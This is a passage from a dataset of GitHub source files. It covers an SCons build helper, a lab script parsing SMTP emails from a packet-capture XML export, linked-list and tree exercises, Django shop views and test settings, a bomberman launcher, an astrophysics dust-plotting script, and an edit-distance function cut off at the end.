'CCFLAGS'\n else:\n # ... while GCC compile flags have precedence at the end\n appends['ccflags'] = 'CCFLAGS'\n if GetEntry(params, 'prepend_includedirs'):\n prepends['includedirs'] = 'CPPPATH'\n else:\n appends['includedirs'] = 'CPPPATH'\n\n for field, var in appends.items():\n values = GetEntry(params, field)\n if values is not None:\n env.Append(**{var : values})\n for field, var in prepends.items():\n values = GetEntry(params, field)\n if values is not None:\n env.Prepend(**{var : values})\n\n # workaround for pulse stripping link flag for unknown reason\n if Allow64BitCompile(env):\n env['SHLINKCOM'] = ('$SHLINK -o $TARGET -m32 $SHLINKFLAGS $SOURCES '\n '$_LIBDIRFLAGS $_LIBFLAGS')\n env['LINKCOM'] = ('$LINK -o $TARGET -m32 $LINKFLAGS $SOURCES '\n '$_LIBDIRFLAGS $_LIBFLAGS')\n\n # any other parameters are replaced without renaming\n for field, value in params.items():\n env.Replace(**{field : value})\n\n # invoke the builder function\n builder = getattr(env, component)\n\n node = builder(name, srcs)\n\n # make a parallel 64bit version if requested\n if Allow64BitCompile(env) and GetEntry(params, 'also64bit'):\n env_64bit = env.Clone()\n env_64bit.FilterOut(CCFLAGS = ['-m32'], LINKFLAGS = ['-m32'])\n env_64bit.Prepend(CCFLAGS = ['-m64', '-fPIC'], LINKFLAGS = ['-m64'])\n name_64bit = name + '64'\n env_64bit.Replace(OBJSUFFIX = '64' + env_64bit['OBJSUFFIX'])\n env_64bit.Replace(SHOBJSUFFIX = '64' + env_64bit['SHOBJSUFFIX'])\n if ('ComponentProgram' == component or\n ('ComponentLibrary' == component and\n env_64bit['COMPONENT_STATIC'] == False)):\n # link 64 bit versions of libraries\n libs = []\n for lib in env_64bit['LIBS']:\n if (_all_lib_targets.has_key(lib) and\n _all_lib_targets[lib].has_key('also64bit')):\n libs.append(lib + '64')\n else:\n libs.append(lib)\n env_64bit.Replace(LIBS = libs)\n\n env_64bit['SHLINKCOM'] = ('$SHLINK -o $TARGET -m64 $SHLINKFLAGS $SOURCES '\n '$_LIBDIRFLAGS $_LIBFLAGS')\n env_64bit['LINKCOM'] = ('$LINK -o $TARGET -m64 $LINKFLAGS $SOURCES '\n '$_LIBDIRFLAGS $_LIBFLAGS')\n builder = getattr(env_64bit, component)\n nodes = [node, builder(name_64bit, srcs)]\n return nodes\n\n if signed: # Note currently incompatible with 64Bit flag\n # Get the name of the built binary, then get the name of the final signed\n # version from it. We need the output path since we don't know the file\n # extension beforehand.\n target = node[0].path.split('_', 1)[1]\n signed_node = env.SignedBinary(\n source = node,\n target = '$STAGING_DIR/' + target,\n )\n env.Alias('signed_binaries', signed_node)\n return signed_node\n\n return node\n\n\ndef AddToDict(dictionary, key, values, append=True):\n \"\"\"Merge the given key value(s) pair into a dictionary. If it contains an\n entry with that key already, then combine by appending or prepending the\n values as directed. Otherwise, assign a new keyvalue pair.\n \"\"\"\n if values is None:\n return\n\n if not dictionary.has_key(key):\n dictionary[key] = values\n return\n\n cur = dictionary[key]\n # TODO: Make sure that there are no duplicates\n # in the list. I can't use python set for this since\n # the nodes that are returned by the SCONS builders\n # are not hashable.\n # dictionary[key] = list(set(cur).union(set(values)))\n if append:\n dictionary[key] = cur + values\n else:\n dictionary[key] = values + cur\n\n\ndef CombineDicts(a, b):\n \"\"\"Unions two dictionaries by combining values of keys shared between them.\n \"\"\"\n c = {}\n for key in a:\n if b.has_key(key):\n c[key] = a[key] + b.pop(key)\n else:\n c[key] = a[key]\n\n for key in b:\n c[key] = b[key]\n\n return c\n\n\ndef RenameKey(d, old, new, append=True):\n AddToDict(d, new, GetEntry(d, old), append)\n","repo_name":"CyFI-Lab-Public/RetroScope","sub_path":"external/chromium/third_party/libjingle/source/talk/site_scons/talk.py","file_name":"talk.py","file_ext":"py","file_size_in_byte":15485,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"78"} +{"seq_id":"31799939198","text":"import sys\nimport xml.etree.ElementTree as ET\nimport csv\nimport re\n\n# Xml parser\ntree = ET.parse(sys.argv[1])\nroot = tree.getroot() # returns a pointer to the first element of the tree\n\nn = 0\nsender = []\nreceiver = []\nsubject = []\nmessage = []\n\n# all the field tags are inside proto tags which are in packet tags. Hence we need to parse inside\nfor child in root:\n for gchild in child:\n # Number of emails = (Number of message packets with proto.showname = \"Internet Message Format\")\n if gchild.get('showname') == \"Internet Message Format\":\n for ggchild in gchild:\n if ggchild.get('name') == \"imf.subject\": # subject is contained in field tag with name = \"imf.subject\"\n subject.append(ggchild.get('showname')[9:]) # getting \n\n elif ggchild.get('name') == \"imf.message_text\": # body message is contained in a field tag which has a field tag as child with name = \"imf.message_text\"\n for field in ggchild:\n message.append(field.get('show'))\n\n n += 1\n\n if gchild.get('showname') == \"Simple Mail Transfer Protocol\": # search only those proto with showname = \"Simple Mail Transfer Protocol\"\n for ggchild in gchild:\n if ggchild.get('name') == \"smtp.command_line\":\n showname = ggchild.get('show')\n if \"FROM\" in showname: # sender email id contains \"from\" in showname\n sender.append(showname[11:-15])\n elif \"TO\" in showname: # receiver email id contains \"to\"\" in showname\n receiver.append(showname[9:-7])\n \n\n\nprint(\"Number of Emails transfered = \" + str(n))\n\nfor i in range(n):\n print()\n print(\"Email - \" + str(i+1))\n print(\"Sender email id - \" + str(sender[i]))\n print(\"Receiver email id - \" + str(receiver[i]))\n print(\"Subject - \" + subject[i])\n print(\"Message Body - \" + message[i])\n ","repo_name":"rohit1309d/Computer-Networks-Lab-CS39006","sub_path":"Lab Test/18CS10013_Q1/1_b.py","file_name":"1_b.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7984987222","text":"from ClaseNodo import Nodo\r\nclass Lista(object):\r\n __comienzo=None\r\n __actual=None\r\n __indice=0\r\n __tope=0\r\n def __init__(self):\r\n self.__comienzo=None\r\n self.__actual=None\r\n def __iter__(self):\r\n return self\r\n def __next__(self):\r\n if self.__indice==self.__tope:\r\n self.__actual=self.__comienzo\r\n self.__indice=0\r\n raise StopIteration\r\n else:\r\n self.__indice+=1\r\n dato = self.__actual.getDato()\r\n self.__actual=self.__actual.getSiguiente()\r\n return dato\r\n def listarDatosProfesores(self):\r\n aux=self.__comienzo\r\n while aux!=None:\r\n a=aux.getDato()\r\n a.mostrarDatos()\r\n aux=aux.getSiguiente()\r\n def insertarVehiculoPorCola(self,persona):\r\n unNodo= Nodo(persona)\r\n unNodo.setSiguiente(self.__comienzo)\r\n self.__comienzo=unNodo\r\n self.__actual=unNodo\r\n self.__tope+=1 #indica la cantidad de objetos\r\n def insertarVehiculoAlFinal(self,persona):\r\n unNodo=Nodo(persona)\r\n if(self.__comienzo==None): #si esta vacia hace una carga comun\r\n unNodo.setSiguiente(self.__comiezo)\r\n self.__comienzo=unNodo\r\n self.__actual=unNodo\r\n self.__tope+=1\r\n else:\r\n aux=self.__comienzo #resguardamos la cabeza\r\n while(aux.getSiguiente()!=None):\r\n aux=aux.getSiguiente()\r\n unNodo.setSiguiente(aux.getSiguiente()) #coloca None en el ultimo Nodo\r\n aux.setSiguiente(unNodo) #y el penultimo queda apuntando al ultimo\r\n self.__actual=unNodo\r\n self.__tope+=1\r\n def insertarVehiculoAdentro(self,persona,pos): #por posicion\r\n unNodo=Nodo(persona)\r\n con=1\r\n if(pos==1): #si desea colocarlo en la primer posicion\r\n unNodo.setSiguiente(self.__comienzo)\r\n self.__comienzo=unNodo\r\n self.__tope+=1\r\n else:\r\n aux=self.__comienzo\r\n while(con<(pos-1)):\r\n aux=aux.getSiguiente()\r\n con+=1\r\n unNodo.setSiguiente(aux.getSiguiente())\r\n aux.setSiguiente(unNodo)\r\n self.__tope+=1\r\n def eliminarPorEdad(self,edad):\r\n if(self.__comienzo.getEdad()==edad):\r\n aux=self.__comienzo\r\n self.__comienzo=self.__comienzo.getSiguiente()\r\n self.__tope-=1\r\n del aux\r\n else:\r\n aux=self.__comienzo\r\n while((aux!=None)&(aux.getEdad()!=edad)):\r\n ant=aux\r\n aux=aux.getSiguiente()\r\n ant.setSiguiente(aux.getSiguiente())\r\n self.__tope-=1\r\n del aux\r\n def encontrarObjeto(self,pos):\r\n if(pos==0):\r\n print(type(self.__comienzo.getDato()))\r\n else:\r\n cont=0\r\n aux=self.__comienzo\r\n while(cont= 150 or len(query) < 1:\n res = Product.objects.none()\n elif len(query.strip()) == 0:\n res = Product.objects.none()\n else:\n allprod = Product.objects.filter(item__icontains=query)\n allcatg = Category.objects.filter(title__icontains=query)\n if allcatg:\n pincatg = allcatg[0].get_products.all()\n res = allprod.union(pincatg)\n else:\n res = allprod\n\n # CART and LIKE\n in_cart = []\n already_liked = []\n if request.user.is_authenticated:\n cart = get_object_or_404(Cart, user=request.user).cart_entry.all()\n for p in res:\n cartp = cart.filter(product=p)\n if cartp:\n in_cart.append(p)\n if p.likes.filter(id=request.user.id).exists():\n already_liked.append(p)\n \n context = {\n 'res': res,\n 'in_cart': in_cart,\n \"already_liked\": already_liked\n }\n return render(request, 'ecom/search_results.html', context)\n\n\ndef contact_us(request):\n name = request.POST.get('fname')\n message = request.POST.get('message')\n email = request.POST.get('email')\n Contact.objects.create(name=name, message=message, email=email)\n return redirect(request.META['HTTP_REFERER']+'#footerCtf')\n\n\ndef product_details(request, id):\n product = Product.objects.get(id=id)\n in_cart = []\n already_liked = []\n if request.user.is_authenticated:\n cart = get_object_or_404(Cart, user=request.user).cart_entry.all()\n cartp = cart.filter(product=product)\n if cartp:\n in_cart.append(product)\n if product.likes.filter(id=request.user.id).exists():\n already_liked.append(product)\n\n # { \"size\":[ \"S\", \"M\", \"L\" ], \"crust\":[ \"cheese burst\", \"classic hand tossed\", \"thin crust\" ] }\n\n pdict2 = {}\n pot = product.options\n if pot != \"\":\n pdict2 = json.loads(pot)\n else:\n pdict2 = None\n\n context = {\n \"product\":product,\n \"already_liked\":already_liked,\n \"in_cart\":in_cart,\n \"product_opts\":pdict2,\n }\n return render(request, 'ecom/product_details.html', context)","repo_name":"Ronik22/Django_PizzaHub","sub_path":"ecom/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5577,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"17541268776","text":"import sys\n\nseq = sys.stdin.readline().strip().split()\n\nres = []\n'''\nlens = tuple( len(i) for i in seq )\nsearch = 0 \nfor len_ in lens:\n if lens.count(len_) >= 2:\n search = len_\n break\nfor word in seq:\n if len(res)==2:\n break\n if len(word)==search:\n res.append(word)\nprint(\" \".join(res))\n'''\n\nindex0 = 0\nindex1 = 0\nlast_diff = 0\nlens = tuple( len(i) for i in seq )\n\nprint(lens)\n\nfor word in seq:\n for word_ in seq:\n if (index0 != index1) and ( len(word) == len(word_)): # Check that are not the same position in seq and len() to be equal\n last_diff = index0 - index1\n res.append(word+\" \"+word_)\n break\n index1 += 1\n index0 += 1\n index1 = 0\n\nif not res:\n print(\"All words have different lengths\")\nelse:\n print(res) \n","repo_name":"ilialecha/Programming_1","sub_path":"Exam-2-review/first_equal.py","file_name":"first_equal.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38520777881","text":"#!/usr/bin/env python3\nimport argparse\n\ndef findPrimes(ceiling):\n if ceiling < 2:\n print(\"No primes below {}\".format(ceiling))\n exit(1)\n\n # List of all primes found\n prime_list = []\n # Squares of all primes found\n prime_squares = []\n\n for number in range(2, ceiling):\n isPrime = True\n for index, prime in enumerate(prime_list):\n # Break on finding a factor\n if number % prime == 0:\n isPrime = False\n break\n\n # Break if all possible factors have been checked\n if prime_squares[index] > number: break\n\n # Store prime\n if isPrime:\n prime_list.append(number)\n prime_squares.append(number**2)\n\n return prime_list\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"max\", help=\"Find all primes below max\", type=int, default=1000, nargs='?')\n args = parser.parse_args()\n print(\"Primes below {}: {}\".format(args.max, findPrimes(args.max)))\n\nif __name__ == '__main__':\n main()\n","repo_name":"nzimm/toolkit","sub_path":"eavesdropping/primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17427793866","text":"#!/usr/bin python3\nimport sys, os, subprocess, argparse\n\nif __name__ == \"__main__\":\n try:\n import pygame\n except:\n try:\n import pip\n except:\n sys.exit(\"Could not import pip package manager. Please install pip for your python distribution.\")\n\n subprocess.check_call([\"python3\", '-m', 'pip', 'install', 'pygame']) # install pkg\n subprocess.check_call([\"python3\", '-m', 'pip', 'install',\"--upgrade\", 'pygame']) # upgrade pkg\n subprocess.check_call([\"python3\", '-m', 'pip', 'install', 'netifaces']) # install netifaces package\n\n sys.path.insert(0, \"%s/core/\" % os.path.dirname(os.path.realpath(__file__)))\n sys.path.insert(0, \"%s/bomberman_src/\" % os.path.dirname(os.path.realpath(__file__)))\n\n argparser = argparse.ArgumentParser(description=\"An online gridcoloring adventure written in Python.\")\n\n argparser.add_argument(\"--username\", dest=\"username\", help=\"Username\", required=True )\n argparser.add_argument(\"--client_port\", dest=\"port\",type=int, help=\"Client port\", required=True)\n argparser.add_argument(\"--serv_ip\", dest=\"server_ip\", help=\"Server ip address.\", required=True)\n argparser.add_argument(\"--serv_port\", dest=\"server_port\", type=int, help=\"Server port\", required=True)\n argparser.add_argument(\"--is_server\", dest=\"is_server\", action=\"store_true\", default=False, help=\"Make the player a server\")\n argparser.add_argument(\"--board_layout\", dest=\"board_layout\", type=int, default=1, choices=[0,1], help=\"Board layout { 0: Empty board | 1: Standard layout. }\")\n args = argparser.parse_args()\n\n import bomberman_main\n\n bomberman_main.main(args.username, args.port, args.server_ip, args.server_port, args.is_server, args.board_layout)\n\n\"\"\"\n try:\n bomberman_main.main(args.username, args.port, args.server_ip, args.server_port, args.is_server)\n except Exception as e:\n sys.exit(\"Game crashed with error: %s\" % e)\n\"\"\"","repo_name":"bcvb95/bomber_man","sub_path":"bomberman.py","file_name":"bomberman.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28482375761","text":"# -*- coding: utf-8 -*-\nfrom decorated.base.context import Context, ctx, ContextError\nfrom unittest.case import TestCase\n\nclass GetSetAttrTest(TestCase):\n def test_set(self):\n with Context(a=1):\n self.assertEquals(1, ctx.a)\n ctx.a = 2\n self.assertEquals(2, ctx.a)\n ctx.b = 3\n self.assertEquals(3, ctx.b)\n d = ctx.dict()\n self.assertEquals({'a': 2, 'b': 3}, d)\n \nclass GetTest(TestCase):\n def test_success(self):\n with Context():\n self.assertIsInstance(ctx.get(), Context)\n \n def test_no_context(self):\n with self.assertRaises(AttributeError):\n ctx.a\n","repo_name":"CooledCoffee/decorated","sub_path":"test/base_test/context_test/ctx_test.py","file_name":"ctx_test.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"81"} +{"seq_id":"13159850623","text":"from __future__ import print_function\nimport sys\nsys.path.append('..')\nfrom chapter2.linked_list import ListNode, restore_list\nfrom tree import create_tree\n\n\ndef create_level_linked_list_aux(root, lists, level):\n \"\"\"Preorder recursive\"\"\"\n if root is None:\n return\n # If `lists` does not contain any node at the level\n if len(lists) == level:\n l = ListNode(root.data)\n lists.append(l)\n else:\n l = lists[level]\n l.next = ListNode(root.data)\n create_level_linked_list_aux(root.left, lists, level + 1)\n create_level_linked_list_aux(root.right, lists, level + 1)\n\n\ndef create_level_linked_list(root):\n res = []\n create_level_linked_list_aux(root, res, 0)\n return res\n\n\ndef create_level_linked_list2(root):\n \"\"\"Level order\"\"\"\n res = []\n if root is None:\n return res\n queue = []\n level = ListNode(root.data)\n res.append(level)\n queue.append(root)\n queue.append(None)\n # `p` is a pointer to the last node of the linked list\n level = ListNode(0) # Second level\n p = level\n while queue:\n root = queue.pop(0)\n if root is None:\n if level.next is not None:\n res.append(level.next)\n if queue:\n queue.append(None)\n level = ListNode(0) # Dummy head for the next level\n p = level\n else:\n if root.left is not None:\n queue.append(root.left)\n p.next = ListNode(root.left.data)\n p = p.next\n if root.right is not None:\n queue.append(root.right)\n p.next = ListNode(root.right.data)\n p = p.next\n return res\n\n\ndef _test():\n pass\n\n\ndef _print():\n a1 = [1, 2, 3, 4, 5]\n a2 = [1, None, 3, None, 4]\n t1 = create_tree(a1)\n t2 = create_tree(a2)\n r1 = create_level_linked_list2(t1)\n r2 = create_level_linked_list2(t2)\n for l in r1:\n print(restore_list(l))\n for l in r2:\n print(restore_list(l))\n\n\nif __name__ == '__main__':\n _test()\n _print()\n","repo_name":"shichao-an/ctci","sub_path":"chapter4/question4.4.py","file_name":"question4.4.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"37248144345","text":"# https://stackoverflow.com/questions/2501457/what-do-i-use-for-a-max-heap-implementation-in-python\n# https://www.adamsmith.haus/python/answers/how-to-use-a-max-heap-in-python\n\n#!!!我的問題:8/6 用 _heapify_max和_heappop_max,反而跑不出答案...Why???\n# 8/8 JM 因為沒有搭配的_heappush_max啊!\n\n\n# Get the MAX heap\nclass Solution:\n\n def lastStoneWeight(self, stones: List[int]) -> int:\n stones = [-s for s in stones]\n heapq.heapify(stones)\n\n while len(stones) > 1:\n # 2/9 必須這樣,不然second會溢出範圍\n first = heapq.heappop(stones)\n second = heapq.heappop(stones)\n if second > first:\n heapq.heappush(stones, first - second)\n # 2/9 first - second才會是負數啊!\n # heapq.heappush(heap, item)\n stones.append(0)\n # 2/9 亦可為heapq.heappush(stone_heap, 0)\n # \"At the end,there is at most 1 stone left.Return its weight\"\n # To handle the eade case\n # (that the stones is empty)\n return abs(stones[0])\n\n # because we *-1 in the begining\n","repo_name":"YiruDing/LeetcodePractice","sub_path":"Neetcode305/Heap/1046_Last_Stone_Weight.py","file_name":"1046_Last_Stone_Weight.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"29453468626","text":"#!/usr/bin/python3\n#coding:utf8\n\n# http://projecteuler.net/problem=15\n#\n# PROBLEM CONTENT:\n# Starting in the top left corner of a 2×2 grid, and only being able to move\n# to the right and down, there are exactly 6 routes to the bottom right corner.\n#\n# How many such routes are there through a 20×20 grid?\n#\n# EXPLANATION:\n# The number of paths from a point to the bottom-right corner is the sum of the\n# number of paths from the point on its right to the bottom-right corner + the\n# number of paths from the point below it to the bottom-right corner. Points at\n# the border of the grid only have one possible path to the bottom-right\n# corner: always right or always down. Setting the boundary conditions we can\n# work recursively from the almost-bottom-right corner to the top-right corner.\n#\n# For a 2x2 grid (note: there n+1 nodes):\n# 0--0--1 0--0--1 0--3--1 6--3--1\n# 0--0--1 ---> 0--2--1 ---> 3--2--1 ---> 3--2--1 ---> Answer: 6\n# 1--1--1 1--1--1 1--1--1 1--1--1\n#\n# A square matrix like this one can be simplified further by only computing the\n# terms of one of the top diagonal part, since it is simmetric. I have decided\n# to use a more general method.\n\nimport time\n\nhorDim = 20\nverDim = 20\n\n\ndef initialise_nodes_grid(nodesGrid):\n defaultRow = [0 for i in range(0,horDim+1)]\n defaultRow[horDim] = 1\n for i in range(0, verDim):\n nodesGrid.append(defaultRow)\n nodesGrid.append([1 for i in range(0, horDim+1)])\n\ndef main():\n # Matrix representing the number of paths from a node to the bottom-right\n # corner\n nodesGrid = []\n initialise_nodes_grid(nodesGrid)\n for i in range(verDim-1, -1, -1):\n for j in range(horDim-1, -1, -1):\n nodesGrid[i][j] = nodesGrid[i+1][j] + nodesGrid[i][j+1]\n print(nodesGrid[0][0])\n\nif __name__ == '__main__':\n start = time.time()\n main()\n elapsed = time.time() - start\n print('Solved in %.2f seconds' % elapsed)\n","repo_name":"nachogoro/euler_project","sub_path":"Problem015.py","file_name":"Problem015.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16475872804","text":"\"\"\"\nFind the kth largest element in an unsorted array. Note that it is the kth largest element in the sorted order, not the kth distinct element.\n\nExample 1:\n\nInput: [3,2,1,5,6,4] and k = 2\nOutput: 5\nExample 2:\n\nInput: [3,2,3,1,2,4,5,5,6] and k = 4\nOutput: 4\n\"\"\"\n\n# This can be done using a max heap of size k.\n# The time complexity is O(nlogk) where n is the size of array and k is the\n# input k.\n\n# This can be implemented using a technique similar to quicksort as well.\n# This technique is also called order statistic.\n# Logic behind this:\n# When we take a pivot and do the quicksort partition, we know how many\n# elements are on either side of the pivot after the parititon loop. We can use\n# this knowledge to know which side to look for and when to stop.\n\ndef get_kth_largest(nums, k):\n\tif len(nums) < k: return -1\n\treturn _get_kth_largest_helper(nums, k, 0, len(nums)-1)\n\ndef _get_kth_largest_helper(nums, k, start, end):\n\tleft = start\n\ti = left - 1\n\tpivot = nums[end]\n\n\twhile left < end:\n\t\tif nums[left] >= pivot:\n\t\t\ti += 1\n\t\t\tnums[i], nums[left] = nums[left], nums[i]\n\t\tleft += 1\n\tnums[i+1], nums[end] = nums[end], nums[i+1]\n\tif i+1 == k-1:\n\t\treturn pivot\n\telif i+1 < k-1:\n\t\treturn _get_kth_largest_helper(nums, k, i+2, end)\n\telse:\n\t\treturn _get_kth_largest_helper(nums, k, start, i)\n\nassert get_kth_largest([3, 2, 1, 5, 6, 4], 2) == 5\nassert get_kth_largest([9, 2, 10, 8, 17, 5], 4) == 8\t\n","repo_name":"henchhing-limbu/Interview-Questions","sub_path":"Array-String/kth_largest.py","file_name":"kth_largest.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"31638579745","text":"products = [\n {\n 'product' : 'camisa',\n 'price': 100\n },\n {\n 'product' : 'pantalones',\n 'price': 300\n },\n {\n 'product' : 'shorts',\n 'price': 180\n }\n]\n\nprices = list(map(lambda item: item['price'], products))\n\nprint(prices)\n\n#agregaremos el atributo impuesto a products con una funcion y map\n\ndef add_tax(el):\n el['taxes'] = el['price'] * .19\n return el\n\n\nnew_products = map(add_tax,products)\n#new_products = map (add_tax, products)\n\nnew_products = list(new_products)\n\nprint(new_products)\nprint(' ')\nprint(products)\n\n ","repo_name":"monick96/Python2","sub_path":"15-map-dicts.py","file_name":"15-map-dicts.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"44201888497","text":"# brandt's c code for radiative transfer outputs to a .dat file.\n# here I read the data and plot the alphas.\n\n# I've moved a copy to the dust_scripts folder so I can back up to github.\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom generate_plots import generate_binned_alphas\n\ndust_model = 'wd' # wd\n\na_300 = 0.9\na_1350 = 0.1\nsig_star = 1.2 # hard coded in the c code\n\n# set up grid of f values (which transform into z_s)\nn_f = 30\nf_min, f_max = 0, 1\nh_f = (f_max - f_min) / n_f / 2\nf_grid = np.linspace(f_min + h_f, f_max - h_f, n_f)\n\n# set up arrays to store total integral\n# and get the wavelengths\n# column 0: lambdas\n# column 1: tau0\n# column 2: sca integral\n# column 3: tir integral\n# column 4: albedo\nif dust_model == 'zd':\n test_data = np.loadtxt('dustsheet_0.15_40_0.5.dat')\nelif dust_model == 'wd':\n test_data = np.loadtxt('dustsheet_0.15_40_0.55_wd01.dat')\ntotal_int = np.zeros(test_data.shape[0])\ntotal_int_denom = np.zeros(test_data.shape[0])\nlambdas = test_data[:, 0]\n\n# get bc03 spectrum\nimport glob\nfrom scipy.interpolate import interp1d\npaths = glob.glob('/Users/blakechellew/Documents/DustProject/BrandtFiles/bc03/*.spec')\nfor p in paths[22:23]:\n print(\"verify path name:\", p)\n a = np.loadtxt(p)\n wav = a[:, 0] # angstroms\n bc03 = a[:, 1]\n bc03_f = interp1d(wav, bc03, kind='cubic')\n\n# integrate\n# maybe run \"make\" first? in case I forgot.\nfor f in f_grid:\n if dust_model == 'zd':\n load_path = 'dustsheet_0.15_40_' + str(f) + '.dat'\n if not os.path.isfile(load_path):\n os.system('./sheetint 0.15 40 ' + str(f))\n elif dust_model == 'wd':\n load_path = 'dustsheet_0.15_40_' + str(f) + '_wd01.dat'\n if not os.path.isfile(load_path):\n os.system('./sheetint 0.15 40 ' + str(f) + ' 2')\n\n data = np.loadtxt(load_path)\n intval = data[:, 2]\n intval_denom = data[:, 3]\n if f < .5:\n transform_factor = sig_star / f\n z_s = sig_star * np.log(2*f)\n else:\n transform_factor = sig_star / (1-f)\n z_s = -sig_star * np.log(2*(1-f))\n print(\"z_s:\", z_s)\n\n # add to the total integral:\n surface_power_factor = a_300 * np.exp(-np.abs(z_s)/300) + a_1350 * np.exp(-np.abs(z_s)/1350)\n df = (f_max - f_min) / n_f\n dz = 2 * sig_star * np.exp(np.abs(z_s) / sig_star) * df\n print(\"integral result:\", intval)\n print(\"integral denom:\", intval_denom)\n print(\"surface_power_factor:\", surface_power_factor)\n total_int += intval * surface_power_factor * dz\n total_int_denom += intval_denom * surface_power_factor * dz\n\n# add up I_tir:\nI_tir = np.sum(total_int_denom * bc03_f(lambdas))\nnu_I_nu = I_tir * 0.52\n\n# plot various things\n# TODO: need to plot against BOSS wavelengths with interpolation and binning (to see where the peak really is)\n# TODO: seems like the z_s range might not be large enough. only goes up to 6 pc I think.\n# TODO: actually should multiply by derivative of surface_power_factor (I think...)\n# TODO: reproduce the results of the other dust model also\n\n# load BOSS wavelengths, prep for interpolation\nboss_lambdas = np.load('/Users/blakechellew/Documents/DustProject/alphas_and_stds/wavelength_boss.npy') # angstroms\ntotal_int_f = interp1d(lambdas, total_int, kind='cubic')\n\nif dust_model == 'zd':\n bd12_factor = 0.52\nelif dust_model == 'wd':\n bd12_factor = 0.49\nplot1 = lambdas * bc03_f(lambdas)\nplot2 = total_int / nu_I_nu\nplot3 = bd12_factor * boss_lambdas * total_int_f(boss_lambdas) / nu_I_nu * bc03_f(boss_lambdas)\n\n# bin the main plot\nlambdas_boss_bin, plot3_bin, stds = generate_binned_alphas([plot3], [np.ones(plot3.shape)], boss_lambdas)\nplot3_bin = plot3_bin[0]\n\nplot1_mean = np.mean(plot1)\nplot2_mean = np.mean(plot2)\nplot3_mean = np.mean(plot3)\nprint(\"plot1\", plot1)\nprint(\"plot2\", plot2)\nprint(\"plot3\", plot3)\nprint(\"plot 1 mean:\", plot1_mean)\nprint(\"plot 2 mean:\", plot2_mean)\nprint(\"plot 3 mean:\", plot3_mean)\nplt.plot(lambdas, plot1 * plot3_mean / plot1_mean, label='bc03 * wav')\nplt.plot(lambdas, plot2 * plot3_mean / plot2_mean, label='just the integral')\nplt.plot(lambdas_boss_bin, plot3_bin, step='pre', label='predicted alphas')\nplt.legend()\nplt.xlim(3800, 9200)\nplt.show()","repo_name":"bchellew15/DustProject","sub_path":"python_scripts/read_c_output_copy.py","file_name":"read_c_output_copy.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7545457557","text":"SECRET_KEY = \"django-insecure\"\nDEBUG = True\nALLOWED_HOSTS = []\nINSTALLED_APPS = [\n \"django.contrib.contenttypes\",\n \"django.contrib.staticfiles\",\n \"django.contrib.auth\",\n \"django.contrib.admin\",\n \"ottu.contrib.django\",\n \"tests.test_ottu.test_contrib.test_django.polls\",\n]\n\nMIDDLEWARE = []\n\nROOT_URLCONF = \"tests.test_ottu.test_contrib.test_django.polls.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"APP_DIRS\": True,\n },\n]\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": \":memory:\",\n },\n}\n\nDEFAULT_AUTO_FIELD = \"django.db.models.AutoField\"\n\nUSE_TZ = True\n\n# Ottu settings\nOTTU_MERCHANT_ID = \"test.ottu.dev\"\nOTTU_AUTH_USERNAME = \"dj_username\"\nOTTU_AUTH_PASSWORD = \"dj_password\"\nOTTU_WEBHOOK_URL = \"https://test.client.dev/webhook-receiver/\"\nOTTU_WEBHOOK_KEY = \"pu9MpX3yPR\"\n","repo_name":"ottuco/ottu-py","sub_path":"tests/test_ottu/test_contrib/test_django/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4123177685","text":"# Given two words word1 and word2, find the minimum number of operations required to convert word1 to word2.\n#\n# You have the following 3 operations permitted on a word:\n# Insert a character\n# Delete a character\n# Replace a character\n#\n# Example 1:\n# Input: word1 = \"horse\", word2 = \"ros\"\n# Output: 3\n# Explanation:\n# horse -> rorse (replace 'h' with 'r')\n# rorse -> rose (remove 'r')\n# rose -> ros (remove 'e')\n#\n# Example 2:\n# Input: word1 = \"intention\", word2 = \"execution\"\n# Output: 5\n# Explanation:\n# intention -> inention (remove 't')\n# inention -> enention (replace 'i' with 'e')\n# enention -> exention (replace 'n' with 'x')\n# exention -> exection (replace 'n' with 'c')\n# exection -> execution (insert 'u')\n\n\ndef min_distance(word1, word2):\n len1 = len(word1) + 1\n len2 = len(word2) + 1\n\n dp = [[0] * len2 for _ in range(len1)]\n for i in range(1, len1):\n dp[i][0] = i\n for j in range(1, len2):\n dp[0][j] = j\n\n for i in range(1, len1):\n for j in range(1, len2):\n cost = 0 if word1[i - 1] == 